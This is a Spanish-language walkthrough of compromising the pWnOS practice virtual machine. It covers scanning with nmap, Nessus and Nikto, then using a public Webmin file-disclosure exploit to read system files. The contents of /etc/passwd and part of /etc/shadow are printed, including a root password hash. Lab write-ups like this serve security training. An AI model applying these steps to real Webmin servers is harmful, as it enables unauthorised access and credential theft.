Hacking MV pnWsoS
Enviado por santidediego • 5 de Septiembre de 2018 • Práctica o problema • 421 Palabras (2 Páginas) • 114 Visitas
Resolución MV PWNOS
Podemos encontrar la máquina en nuestra red con: nmap -sn
Una vez encontrada, ya la podemos escanear con nmap para ver qué puertos tiene abiertos:
[pic 1]
Llama la atención que podemos intentar entrar a través del navegador, sin embargo vamos a realizar un escaneo con Nessus para ver si podemos encontrar más puntos de entrada.
Tras probar con algunas vulnerabilidades, como la CVE-2008-0166, que permite realizar fuerza bruta por ssh. Intentándolo con root no se ha conseguido nada, así que pasamos Nikto. Con Nikto obtenemos información interesante, por ejemplo que podemos intentar un file inclusión.
No obstante, si nos fijamos, el puerto 10000 puede sernos de ayuda para entrar, así que vamos a buscar exploits para webmin. Obtenemos los siguientes:
[pic 2]
Tenemos varios: inclusión de ficheros, escalada de privilegios… nos fijamos que nuestra versión de webmin es la 0.01 y por tanto nos podrían servir aquellos que sirvan para esa versión, por ejemplo, 1997.php y 2017.pl. Elegimos la de perl, ya que la de php no funciona correctamente.
Efectivamente así es y podemos ver el fichero /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
y también el /etc/shadow
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
...